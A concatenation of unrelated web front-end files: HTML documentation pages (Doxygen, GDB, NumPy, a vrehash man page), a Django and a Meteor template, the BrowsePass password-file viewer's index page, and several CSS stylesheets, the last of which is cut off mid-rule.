<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#aa4575950788bfa70dee5fad2d851230e">RemovePrefix</a>(const char *prefix, sizet prefixLength)=0</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1ISharedObject.html#afcb42109aed83c3b0c133bc413388037">AdobeXMPCommon::REQ_FRIEND_CLASS_DECLARATION</a>()</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1ISharedObject.html">AdobeXMPCommon::ISharedObject</a></td><td class="entry"><span class="mlabel">protected</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IVersionable.html#ac619a81b428c88cfce50feaa91a2479f">AdobeXMPCommon::IVersionable::REQ_FRIEND_CLASS_DECLARATION</a>()</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IVersionable.html">AdobeXMPCommon::IVersionable</a></td><td class="entry"><span class="mlabel">protected</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IThreadSafe.html#a0f31eb9677c4af06288319e363c21ebc">AdobeXMPCommon::IThreadSafe::REQ_FRIEND_CLASS_DECLARATION</a>()</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IThreadSafe.html">AdobeXMPCommon::IThreadSafe</a></td><td class="entry"><span class="mlabel">protected</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#a3dfd0d265952656c9b6641d8ce523e40">Size</a>() const __NOTHROW__=0</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#aabfdffd2a782e83a627bbe1c687a922b">~INameSpacePrefixMap_v1</a>() __NOTHROW__</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">inline</span><span class="mlabel">protected</span><span class="mlabel">virtual</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1ISharedObject.html#a5869ff89d0b7dd0a7b525401a1d57b31">~ISharedObject</a>() __NOTHROW__=0</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1ISharedObject.html">AdobeXMPCommon::ISharedObject</a></td><td class="entry"><span class="mlabel">inline</span><span class="mlabel">protected</span><span class="mlabel">pure virtual</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IVersionable.html#a3ccd9a1bdf7008906e094fb4e7f69826">~IVersionable</a>()</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IVersionable.html">AdobeXMPCommon::IVersionable</a></td><td class="entry"><span class="mlabel">inline</span><span class="mlabel">protected</span><span class="mlabel">virtual</span></td></tr>
</table></div><!-- contents -->
</div><!-- doc-content -->
<hr size="1"><address style="text-align: right;"><small>
XMPToolkit documentation generated by <a href="http://www.doxygen.org/index.html">doxygen</a> 1.8.11</small></address>
</body>
</html>
|
templates/includes/group-multiple-selection.html
|
jonatascastro12/barnabe
|
{% load i18n %}
<div class="row" id="group-multiple-selection">
<div class="col-md-12">
<div class="btn-group disabled">
<button type="button" id="multiple-selection-action" class="btn btn-info dropdown-toggle" aria-expanded="false" disabled data-toggle="dropdown">{% trans 'Multiple selection action' %}
<span class="caret"></span>
<span class="sr-only">Toggle Dropdown</span>
</button>
<ul class="dropdown-menu" role="menu">
<li><a id="remove-{{ obj_class }}" href="#"><span class="glyphicon glyphicon-remove" aria-hidden="true"></span> {% trans 'Remove' %}</a></li>
<li class="divider"></li>
<li><a id="print-members-cards" href="#"><span class="glyphicon glyphicon-print" aria-hidden="true"></span> {% trans 'Print ID Cards' %}</a></li>
</ul>
</div>
</div>
</div>
|
index.html
|
chkuendig/browsepass
|
<!DOCTYPE html>
<html ng-app="BrowsePassApp" ng-csp style="overflow-y: scroll">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="bootstrap/3.2.0/css/bootstrap.min.css">
<link rel="stylesheet" href="bootstrap/3.2.0/css/bootstrap-theme.min.css">
<link rel="shortcut icon" href="favicon.ico"/>
<title>BrowsePass</title>
<style>
body { -webkit-user-select: text; }
.nav, .pagination, .carousel, .panel-title a { cursor: pointer; }
.panel-group { margin-bottom: 5px; }
.panel-body { padding-right: 0px; margin-right: -1px;}
.btn-file { position: relative; overflow: hidden; }
.btn-file input[type=file] {
position: absolute; top: 0; left: 0;
opacity: 0;
}
.input-group-btn label { width: 100px; }
.footer { clear: both; padding-top: 10px; }
.footer li { display: inline; }
.bp-field-value { white-space: pre-wrap; }
</style>
<!-- KDBX libraries -->
<script src="cryptojs/components/core-min.js" type="text/javascript"></script>
<script src="cryptojs/components/cipher-core-min.js" type="text/javascript"></script>
<script src="cryptojs/components/mode-ecb-min.js" type="text/javascript"></script>
<script src="cryptojs/components/aes-min.js" type="text/javascript"></script>
<script src="cryptojs/components/pad-nopadding-min.js" type="text/javascript"></script>
<script src="cryptojs/components/sha256-min.js" type="text/javascript"></script>
<script src="inflate.js" type="text/javascript"></script>
<script src="jdataview.js" type="text/javascript"></script>
<script src="salsa20.js" type="text/javascript"></script>
<script src="kdbx.js" type="text/javascript"></script>
<script src="mimetype.js" type="text/javascript"></script>
<!-- BrowsePass components -->
<script src="angularjs/1.2.21/angular.min.js" type="text/javascript"></script>
<script src="ui-bootstrap/ui-bootstrap-tpls-0.11.0.min.js" type="text/javascript"></script>
<script src="app.js" type="text/javascript"></script>
<script src="app-controller.js" type="text/javascript"></script>
<script src="components/gdrive/gdrive-service.js" type="text/javascript"></script>
<script src="components/gdrive/gdrive-controller.js" type="text/javascript"></script>
<script src="components/dropbox/dropbox-service.js" type="text/javascript"></script>
<script src="components/vault/vault-service.js" type="text/javascript"></script>
<script src="components/dialog/dialog-service.js" type="text/javascript"></script>
<script src="components/file-input/dropzone-directive.js" type="text/javascript"></script>
<script src="components/file-input/receiver-directive.js" type="text/javascript"></script>
<script src="components/hotkey/hotkey-directive.js" type="text/javascript"></script>
<script src="components/open/open-controller.js" type="text/javascript"></script>
<script src="components/group/group-controller.js" type="text/javascript"></script>
<script src="components/entry/entry-controller.js" type="text/javascript"></script>
<script src="components/field/field-directive.js" type="text/javascript"></script>
<!-- Google Drive & Google Picker -->
<script src="gapi-chrome-apps.js" type="text/javascript"></script>
<!-- Dropbox Chooser Drop-in -->
<script type="text/javascript" src="https://www.dropbox.com/static/api/2/dropins.js" id="dropboxjs" data-app-key="qe83tqslyje9xt3"></script>
</head>
<body ng-controller="AppController">
<div class="text-center center-block">
<h1><img src="icon-48.png" /> BrowsePass</h1>
</div>
<div ng-controller="OpenController" ng-include="'components/open/open-template.html'"></div>
<div ng-if="isLoaded()" class="input-group well-sm">
<span class="input-group-btn">
<button class="btn btn-default" btn-checkbox ng-model="appConfig.showGroups">Show Groups</button>
</span>
<input type="text" class="form-control" placeholder="Filter" ng-model="appConfig.filter" hotkey="{ctrlKey: true, keyCode: 'F'.charCodeAt(0)}" />
<span class="input-group-btn">
<button class="btn" ng-class="{'btn-info': appConfig.filter, 'btn-default': !appConfig.filter}" ng-disabled="!appConfig.filter" ng-click="appConfig.filter=''">
<i class="glyphicon glyphicon-filter"></i>
</button>
</span>
</div>
<div ng-controller="GroupController">
<div ng-repeat="group in groups" ng-include="'components/group/group-template.html'"></div>
</div>
<div class="footer text-muted">
<ul>
<li>Licensed under GNU Public License version 2 <i class="glyphicon glyphicon-question-sign" popover-placement="right" popover="with compatible or public domain components AngularJS (MIT License), Bootstrap (MIT License), CryptoJS (New BSD License), gapi-chrome-apps (Apache v2), jDataView (wtfpl License), UI-Bootstrap (MIT License) and unknown components salsa20.js, inflate.js."></i></li>
<li>·</li>
<li><a href="https://github.com/chkuendig/browsepass" target="_blank">Project page</a></li>
<li>·</li>
<li><a href="https://github.com/chkuendig/browsepass/issues" target="_blank">Feedback</a></li>
</ul>
</div>
</body>
</html>
|
toolchain/arm_cm0/share/doc/gcc-arm-none-eabi/html/gdb/ARM_002dSpecific-Protocol-Details.html
|
jocelynmass/nrf51
|
<html lang="en">
<head>
<title>ARM-Specific Protocol Details - Debugging with GDB</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="Debugging with GDB">
<meta name="generator" content="makeinfo 4.8">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="Architecture_002dSpecific-Protocol-Details.html#Architecture_002dSpecific-Protocol-Details" title="Architecture-Specific Protocol Details">
<link rel="next" href="MIPS_002dSpecific-Protocol-Details.html#MIPS_002dSpecific-Protocol-Details" title="MIPS-Specific Protocol Details">
<link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage">
<!--
Copyright (C) 1988-2018 Free Software Foundation, Inc.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3 or
any later version published by the Free Software Foundation; with the
Invariant Sections being ``Free Software'' and ``Free Software Needs
Free Documentation'', with the Front-Cover Texts being ``A GNU Manual,''
and with the Back-Cover Texts as in (a) below.
(a) The FSF's Back-Cover Text is: ``You are free to copy and modify
this GNU Manual. Buying copies from GNU Press supports the FSF in
developing GNU and promoting software freedom.''
-->
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
pre.display { font-family:inherit }
pre.format { font-family:inherit }
pre.smalldisplay { font-family:inherit; font-size:smaller }
pre.smallformat { font-family:inherit; font-size:smaller }
pre.smallexample { font-size:smaller }
pre.smalllisp { font-size:smaller }
span.sc { font-variant:small-caps }
span.roman { font-family:serif; font-weight:normal; }
span.sansserif { font-family:sans-serif; font-weight:normal; }
--></style>
</head>
<body>
<div class="node">
<p>
<a name="ARM-Specific-Protocol-Details"></a>
<a name="ARM_002dSpecific-Protocol-Details"></a>
Next: <a rel="next" accesskey="n" href="MIPS_002dSpecific-Protocol-Details.html#MIPS_002dSpecific-Protocol-Details">MIPS-Specific Protocol Details</a>,
Up: <a rel="up" accesskey="u" href="Architecture_002dSpecific-Protocol-Details.html#Architecture_002dSpecific-Protocol-Details">Architecture-Specific Protocol Details</a>
<hr>
</div>
<h4 class="subsection">E.5.1 <acronym>ARM</acronym>-specific Protocol Details</h4>
<ul class="menu">
<li><a accesskey="1" href="ARM-Breakpoint-Kinds.html#ARM-Breakpoint-Kinds">ARM Breakpoint Kinds</a>
</ul>
</body></html>
|
doc/vrehash.html
|
hetznerZApackages/vmailmgr
|
<HTML>
<HEAD>
<TITLE>vrehash - reorganize users directory</TITLE>
<LINK REV="made" HREF="mailto:root@porky.devel.redhat.com">
</HEAD>
<BODY>
<!-- INDEX BEGIN -->
<!--
<UL>
<LI><A HREF="#NAME">NAME</A>
<LI><A HREF="#SYNOPSIS">SYNOPSIS</A>
<LI><A HREF="#DESCRIPTION">DESCRIPTION</A>
<LI><A HREF="#RETURN_VALUE">RETURN VALUE</A>
<LI><A HREF="#NOTES">NOTES</A>
<LI><A HREF="#WARNINGS">WARNINGS</A>
<LI><A HREF="#AUTHOR">AUTHOR</A>
</UL>
-->
<!-- INDEX END -->
<P>
<H1><A NAME="NAME">NAME</A></H1>
<P>
vrehash - reorganize users directory
<P>
<HR>
<H1><A NAME="SYNOPSIS">SYNOPSIS</A></H1>
<P>
<STRONG>vrehash</STRONG>
<P>
<HR>
<H1><A NAME="DESCRIPTION">DESCRIPTION</A></H1>
<P>
This program is designed to be run after the sysadmin has changed the
<CODE>user-dir-bits</CODE> or <CODE>user-dir-slices</CODE> configuration variables. It creates a new users directory called <CODE>new.users</CODE>, where <CODE>users</CODE>
is the configured name of the user directory. It then traverses the
password table, creates a new user directory name for each user, and moves
the user's mail directory to the new directory name, creating any necessary
directories as it goes. Any alias entries in the password table are copied
as-is.
<P>
<HR>
<H1><A NAME="RETURN_VALUE">RETURN VALUE</A></H1>
<P>
Returns 1 if any part of the process fails; 0 otherwise.
<P>
<HR>
<H1><A NAME="NOTES">NOTES</A></H1>
<P>
When the process is completed, a the old users directory will have been
moved to <CODE>backup.users</CODE>. If no errors occurred, you should be able to safely delete this directory
and all its subdirectories. Check this directory first, though, to ensure
that no important files remain.
<P>
<HR>
<H1><A NAME="WARNINGS">WARNINGS</A></H1>
<P>
This program is not particularly careful to clean up after itself if an
error occurs. If an error occurs, you will have to check the status of the
current directory, the virtual password file, and all the virtual users
subdirectories in both <CODE>users</CODE> and <CODE>new.users</CODE>.
<P>
<HR>
<H1><A NAME="AUTHOR">AUTHOR</A></H1>
<P>
Bruce Guenter <<A HREF="mailto:bruceg@em.ca">bruceg@em.ca</A>>
</BODY>
</HTML>
|
wp-content/plugins/flexslider/js/flexslider.css
|
Sapian/Bowkerlaw
|
/*
* jQuery FlexSlider v1.5
* http://flex.madebymufffin.com
*
* Copyright 2011, Tyler Smith
* Free to use under the MIT license.
* http://www.opensource.org/licenses/mit-license.php
*/
/* FlexSlider Necessary Styles
*********************************/
.flexslider {width: 100%; margin: 0; padding: 0;}
.flexslider .slides li {display: none;} /* Hide the slides before the JS is loaded. Avoids image jumping */
.flexslider .slides img {max-width: 100%; display: block;}
/* Browser Resets */
.flexslider a {outline: none;}
.slides,
.flex-control-nav,
.flex-direction-nav {margin: 0; padding: 0; list-style: none;}
/* No JavaScript Fallback */
/* If you are not using another script, such as Modernizr, make sure you
* include js that eliminates this class on page load
*/
.no-js .slides li:first-child {display: block;}
/* FlexSlider Default Theme
*********************************/
.flexslider {background: #fff; border: 4px solid #fff; position: relative; -webkit-border-radius: 5px; -moz-border-radius: 5px; -o-border-radius: 5px; border-radius: 5px;}
.flexslider .slides li {position: relative;}
/* Suggested container for "Slide" animation setups. Can replace this with your own, if you wish */
.flexslider-container {position: relative;}
/* Caption style */
.flex-caption {width: 96%; padding: 2%; position: absolute; left: 0; bottom: 0; background: rgba(0,0,0,.3); color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,.3); font-size: 14px; line-height: 18px;}
/* Direction Nav */
.flex-direction-nav li a {width: 52px; height: 52px; margin: -13px 0 0; display: block; background: url(../images/bg_direction_nav.png) no-repeat 0 0; position: absolute; top: 50%; cursor: pointer; text-indent: -9999px;} /* set negative margin-top equal to half the height on the directional-nav for perfect vertical centering */
.flex-direction-nav li a.next {background-position: -52px 0; right: -21px;}
.flex-direction-nav li a.prev {background-position: 0 0; left: -20px;}
/* Control Nav */
.flex-control-nav {width: 100%; position: absolute; bottom: -30px; text-align: center;}
.flex-control-nav li {margin: 0 0 0 5px; display: inline-block; zoom: 1; *display: inline;}
.flex-control-nav li:first-child {margin: 0;}
.flex-control-nav li a {width: 13px; height: 13px; display: block; background: url(../images/bg_control_nav.png) no-repeat 0 0; cursor: pointer; text-indent: -9999px;}
.flex-control-nav li a:hover {background-position: 0 -13px;}
.flex-control-nav li a.active {background-position: 0 -26px; cursor: default;}
|
you/you.html
|
loopdotcoop/looptopia
|
<head>
<!-- you.html -->
</head>
<template name="you">
<tt class="x">you.html
{{$.Config.you.version}}</tt>
<div class="row">
<div class="large-12 columns">
<div class="you dashboard at">
<h3>Account settings, etc</h3>
{{#each widgets 'you'}}
<a href="{{ path }}" target="{{#if $exists target}}{{ target }}{{/if}}" id="{{ id }}" class="ldc-icon" title="{{ title }}">
<div>{{! table-row}}
<div class="{{ icon }}"></div>
</div>
<div>{{! table-row}}
<h4>{{{ name }}}</h4>
</div>
</a>
{{/each}}
</div>
</div>
</div>
</template>
|
Coding/Python/numpy-html-1.10.1/reference/generated/numpy.dtype.newbyteorder.html
|
platinhom/ManualHom
|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>numpy.dtype.newbyteorder — NumPy v1.10 Manual</title>
<link rel="stylesheet" type="text/css" href="../../static_/css/spc-bootstrap.css">
<link rel="stylesheet" type="text/css" href="../../static_/css/spc-extend.css">
<link rel="stylesheet" href="../../static_/scipy.css" type="text/css" >
<link rel="stylesheet" href="../../static_/pygments.css" type="text/css" >
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: '../../',
VERSION: '1.10.1',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: false
};
</script>
<script type="text/javascript" src="../../static_/jquery.js"></script>
<script type="text/javascript" src="../../static_/underscore.js"></script>
<script type="text/javascript" src="../../static_/doctools.js"></script>
<script type="text/javascript" src="../../static_/js/copybutton.js"></script>
<link rel="author" title="About these documents" href="../../about.html" >
<link rel="top" title="NumPy v1.10 Manual" href="../../index.html" >
<link rel="up" title="numpy.dtype" href="numpy.dtype.html" >
<link rel="next" title="numpy.format_parser" href="numpy.format_parser.html" >
<link rel="prev" title="numpy.dtype.subdtype" href="numpy.dtype.subdtype.html" >
</head>
<body>
<div class="container">
<div class="header">
</div>
</div>
<div class="container">
<div class="main">
<div class="row-fluid">
<div class="span12">
<div class="spc-navbar">
<ul class="nav nav-pills pull-left">
<li class="active"><a href="../../index.html">NumPy v1.10 Manual</a></li>
<li class="active"><a href="../index.html" >NumPy Reference</a></li>
<li class="active"><a href="../routines.html" >Routines</a></li>
<li class="active"><a href="../routines.dtype.html" >Data type routines</a></li>
<li class="active"><a href="numpy.dtype.html" accesskey="U">numpy.dtype</a></li>
</ul>
<ul class="nav nav-pills pull-right">
<li class="active">
<a href="../../genindex.html" title="General Index"
accesskey="I">index</a>
</li>
<li class="active">
<a href="numpy.format_parser.html" title="numpy.format_parser"
accesskey="N">next</a>
</li>
<li class="active">
<a href="numpy.dtype.subdtype.html" title="numpy.dtype.subdtype"
accesskey="P">previous</a>
</li>
</ul>
</div>
</div>
</div>
<div class="row-fluid">
<div class="spc-rightsidebar span3">
<div class="sphinxsidebarwrapper">
<h4>Previous topic</h4>
<p class="topless"><a href="numpy.dtype.subdtype.html"
title="previous chapter">numpy.dtype.subdtype</a></p>
<h4>Next topic</h4>
<p class="topless"><a href="numpy.format_parser.html"
title="next chapter">numpy.format_parser</a></p>
</div>
</div>
<div class="span9">
<div class="bodywrapper">
<div class="body" id="spc-section-body">
<div class="section" id="numpy-dtype-newbyteorder">
<h1>numpy.dtype.newbyteorder<a class="headerlink" href="#numpy-dtype-newbyteorder" title="Permalink to this headline">¶</a></h1>
<dl class="method">
<dt id="numpy.dtype.newbyteorder">
<tt class="descclassname">dtype.</tt><tt class="descname">newbyteorder</tt><big>(</big><em>new_order='S'</em><big>)</big><a class="headerlink" href="#numpy.dtype.newbyteorder" title="Permalink to this definition">¶</a></dt>
<dd><p>Return a new dtype with a different byte order.</p>
<p>Changes are also made in all fields and sub-arrays of the data type.</p>
<table class="docutils field-list" frame="void" rules="none">
<col class="field-name" />
<col class="field-body" />
<tbody valign="top">
<tr class="field-odd field"><th class="field-name">Parameters:</th><td class="field-body"><p class="first"><strong>new_order</strong> : string, optional</p>
<blockquote>
<div><p>Byte order to force; a value from the byte order
specifications below. The default value (‘S’) results in
swapping the current byte order.
<em class="xref py py-obj">new_order</em> codes can be any of:</p>
<div class="highlight-python"><div class="highlight"><pre>* 'S' - swap dtype from current to opposite endian
* {'<', 'L'} - little endian
* {'>', 'B'} - big endian
* {'=', 'N'} - native order
* {'|', 'I'} - ignore (no change to byte order)
</pre></div>
</div>
<p>The code does a case-insensitive check on the first letter of
<em class="xref py py-obj">new_order</em> for these alternatives. For example, any of ‘>’
or ‘B’ or ‘b’ or ‘brian’ are valid to specify big-endian.</p>
</div></blockquote>
</td>
</tr>
<tr class="field-even field"><th class="field-name">Returns:</th><td class="field-body"><p class="first"><strong>new_dtype</strong> : dtype</p>
<blockquote class="last">
<div><p>New dtype object with the given change to the byte order.</p>
</div></blockquote>
</td>
</tr>
</tbody>
</table>
<p class="rubric">Notes</p>
<p>Changes are also made in all fields and sub-arrays of the data type.</p>
<p class="rubric">Examples</p>
<div class="highlight-python"><div class="highlight"><pre><span class="gp">>>> </span><span class="kn">import</span> <span class="nn">sys</span>
<span class="gp">>>> </span><span class="n">sys_is_le</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">byteorder</span> <span class="o">==</span> <span class="s">'little'</span>
<span class="gp">>>> </span><span class="n">native_code</span> <span class="o">=</span> <span class="n">sys_is_le</span> <span class="ow">and</span> <span class="s">'<'</span> <span class="ow">or</span> <span class="s">'>'</span>
<span class="gp">>>> </span><span class="n">swapped_code</span> <span class="o">=</span> <span class="n">sys_is_le</span> <span class="ow">and</span> <span class="s">'>'</span> <span class="ow">or</span> <span class="s">'<'</span>
<span class="gp">>>> </span><span class="n">native_dt</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">dtype</span><span class="p">(</span><span class="n">native_code</span><span class="o">+</span><span class="s">'i2'</span><span class="p">)</span>
<span class="gp">>>> </span><span class="n">swapped_dt</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">dtype</span><span class="p">(</span><span class="n">swapped_code</span><span class="o">+</span><span class="s">'i2'</span><span class="p">)</span>
<span class="gp">>>> </span><span class="n">native_dt</span><span class="o">.</span><span class="n">newbyteorder</span><span class="p">(</span><span class="s">'S'</span><span class="p">)</span> <span class="o">==</span> <span class="n">swapped_dt</span>
<span class="go">True</span>
<span class="gp">>>> </span><span class="n">native_dt</span><span class="o">.</span><span class="n">newbyteorder</span><span class="p">()</span> <span class="o">==</span> <span class="n">swapped_dt</span>
<span class="go">True</span>
<span class="gp">>>> </span><span class="n">native_dt</span> <span class="o">==</span> <span class="n">swapped_dt</span><span class="o">.</span><span class="n">newbyteorder</span><span class="p">(</span><span class="s">'S'</span><span class="p">)</span>
<span class="go">True</span>
<span class="gp">>>> </span><span class="n">native_dt</span> <span class="o">==</span> <span class="n">swapped_dt</span><span class="o">.</span><span class="n">newbyteorder</span><span class="p">(</span><span class="s">'='</span><span class="p">)</span>
<span class="go">True</span>
<span class="gp">>>> </span><span class="n">native_dt</span> <span class="o">==</span> <span class="n">swapped_dt</span><span class="o">.</span><span class="n">newbyteorder</span><span class="p">(</span><span class="s">'N'</span><span class="p">)</span>
<span class="go">True</span>
<span class="gp">>>> </span><span class="n">native_dt</span> <span class="o">==</span> <span class="n">native_dt</span><span class="o">.</span><span class="n">newbyteorder</span><span class="p">(</span><span class="s">'|'</span><span class="p">)</span>
<span class="go">True</span>
<span class="gp">>>> </span><span class="n">np</span><span class="o">.</span><span class="n">dtype</span><span class="p">(</span><span class="s">'<i2'</span><span class="p">)</span> <span class="o">==</span> <span class="n">native_dt</span><span class="o">.</span><span class="n">newbyteorder</span><span class="p">(</span><span class="s">'<'</span><span class="p">)</span>
<span class="go">True</span>
<span class="gp">>>> </span><span class="n">np</span><span class="o">.</span><span class="n">dtype</span><span class="p">(</span><span class="s">'<i2'</span><span class="p">)</span> <span class="o">==</span> <span class="n">native_dt</span><span class="o">.</span><span class="n">newbyteorder</span><span class="p">(</span><span class="s">'L'</span><span class="p">)</span>
<span class="go">True</span>
<span class="gp">>>> </span><span class="n">np</span><span class="o">.</span><span class="n">dtype</span><span class="p">(</span><span class="s">'>i2'</span><span class="p">)</span> <span class="o">==</span> <span class="n">native_dt</span><span class="o">.</span><span class="n">newbyteorder</span><span class="p">(</span><span class="s">'>'</span><span class="p">)</span>
<span class="go">True</span>
<span class="gp">>>> </span><span class="n">np</span><span class="o">.</span><span class="n">dtype</span><span class="p">(</span><span class="s">'>i2'</span><span class="p">)</span> <span class="o">==</span> <span class="n">native_dt</span><span class="o">.</span><span class="n">newbyteorder</span><span class="p">(</span><span class="s">'B'</span><span class="p">)</span>
<span class="go">True</span>
</pre></div>
</div>
</dd></dl>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="container container-navbar-bottom">
<div class="spc-navbar">
</div>
</div>
<div class="container">
<div class="footer">
<div class="row-fluid">
<ul class="inline pull-left">
<li>
© Copyright 2008-2009, The Scipy community.
</li>
<li>
Last updated on Oct 18, 2015.
</li>
<li>
Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.2.1.
</li>
</ul>
</div>
</div>
</div>
</body>
</html>
|
wp-content/themes/theshop/ReduxFramework/ReduxCore/inc/fields/info/field_info.css
|
estrategasdigitales/Dagutorio
|
.redux-info-field {
min-height: 20px;
padding: 8px 19px;
margin: 10px 0;
border: 1px solid;
border-radius: 4px;
border: 1px solid;
position: relative;
}
.redux-info-field h1,
.redux-info-field h2,
.redux-info-field h3,
.redux-info-field h4,
.redux-info-field h5,
.redux-info-field h6 {
border-bottom: 0 !important;
}
.redux-info-field h3 {
color: #777;
}
.redux-info-field .redux-info-icon {
display: inline-block;
margin-right: 15px;
}
.redux-info-field .redux-info-icon i {
font-size: 2em;
}
.redux-info-field .redux-info-desc {
display: inline-block;
vertical-align: top;
}
.redux-info-field.redux-normal {
background-color: #eeeeee;
border-color: #cccccc;
color: #666666;
}
.redux-info-field.redux-normal i {
color: #c5c5c5;
}
.redux-info-field.redux-warning {
background-color: #fbeba4;
border-color: #d7c281;
color: #958234;
}
.redux-info-field.redux-warning i {
color: #dcca81;
}
.redux-info-field.redux-success {
background-color: #c4ee91;
border-color: #71af5d;
color: #4d7615;
}
.redux-info-field.redux-success i {
color: #a0ca6c;
}
.redux-info-field.redux-critical {
background-color: #fba1a3;
border-color: #b84f5b;
color: #981225;
}
.redux-info-field.redux-critical i {
color: #dd767d;
}
.redux-info-field.redux-info {
background-color: #d3e4f4;
border-color: #a9b6c2;
color: #5c80a1;
}
.redux-info-field.redux-info i {
color: #afc6da;
}
.redux-notice-field {
margin: 15px 0 0;
background-color: #fff;
border: 0;
border-left: 4px solid #f3f3f3;
-webkit-box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.1);
box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.1);
padding: 1px 12px;
}
.redux-notice-field h1,
.redux-notice-field h2,
.redux-notice-field h3,
.redux-notice-field h4,
.redux-notice-field h5,
.redux-notice-field h6 {
border-bottom: 0 !important;
}
.redux-notice-field p {
margin: .5em 0;
padding: 2px;
}
.redux-notice-field .redux-info-icon {
display: inline-block;
margin-right: 15px;
}
.redux-notice-field .redux-info-icon i {
font-size: 2em;
}
.redux-notice-field .redux-info-desc {
display: inline-block;
vertical-align: top;
}
.redux-notice-field.redux-info {
border-left: 4px solid #0099d5;
}
.redux-notice-field.redux-success {
border-left: 4px solid #7ad03a;
}
.redux-notice-field.redux-warning {
border-left: 4px solid #fbeba4;
}
.redux-notice-field.redux-critical {
border-left: 4px solid #dd3d36;
}
.redux-main .redux-field-container.redux-container-info {
padding: 0;
}
.wp-customizer .hasIcon.redux-notice-field .redux-info-desc, .wp-customizer .hasIcon.redux-info-field .redux-info-desc {
display: block;
margin-left: 43px;
}
.wp-customizer .hasIcon.redux-notice-field .redux-info-icon, .wp-customizer .hasIcon.redux-info-field .redux-info-icon {
float: left;
}
.wp-customizer .redux-main .customize-control.customize-control-redux-info {
border-bottom: 0;
}
|
assets/header.css
|
cleberpv/SistemaCalc
|
body{
padding-top: 50px;
position: relative;
}
pre {
tab-size: 8;
}
@media screen and (max-width: 768px) {
.side-collapse-container{
width:100%;
position:relative;
left:0;
transition:left .4s;
}
.side-collapse-container.out{
left:200px;
}
.side-collapse {
top:50px;
bottom:0;
left:0;
width:200px;
position:fixed;
overflow:hidden;
transition:width .4s;
}
.side-collapse.in {
width:0;
}
}
|
Content/estilos.css
|
alfre/Prestlan
|
html, body {
padding: 0;
margin: 0;
}
html {
height: 100%;
}
body {
background-color: #f3f3f3;
font-family: Arial, Helvetica, Verdana;
font-size: 14px;
line-height: 22px;
color: #666;
min-height: 100%;
position: relative;
-webkit-text-size-adjust: none;
}
body * {
text-shadow: none;
}
h1, h2, h3, h4, h5, h6 {
line-height: 1;
font-weight: bold;
margin: 20px 0 10px 0;
}
h1, h2, h3 {
font-size: 18px;
color: rgba(55,179,73,1);
}
h4, h5, h6 {
font-size: 16px;
}
p {
margin: 0 0 10px 0;
}
a, a:link, a:active, a:visited, a:hover {
text-decoration: none;
}
select,
input[type="text"] {
background: #fff;
border: 1px solid #ccc;
}
.mm-label.button {
text-indent: 0 !important;
padding: 20px 20px 40px 20px !important;
}
pre {
font-size: 12px;
width: 100%;
overflow: auto;
-webkit-overflow-scrolling: touch;
}
nav:not(.mm-menu) {
display: none;
}
.header,
.content,
.footer {
text-align: center;
}
.header,
.footer {
background: #777;
font-size: 16px;
font-weight: bold;
color: #fff;
line-height: 40px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
width: 100%;
height: 40px;
padding: 0 50px;
}
.header.mm-fixed-top {
position: fixed;
top: 0;
left: 0;
}
.header a {
background: center center no-repeat transparent;
background-image: url( data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABkAAAAZCAYAAADE6YVjAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAADhJREFUeNpi/P//PwOtARMDHQBdLGFBYtMq3BiHT3DRPU4YR4NrNAmPJuHRJDyahEeT8Ii3BCDAAF0WBj5Er5idAAAAAElFTkSuQmCC );
display: block;
width: 40px;
height: 40px;
position: absolute;
top: 0;
left: 10px;
}
.header a.contacts {
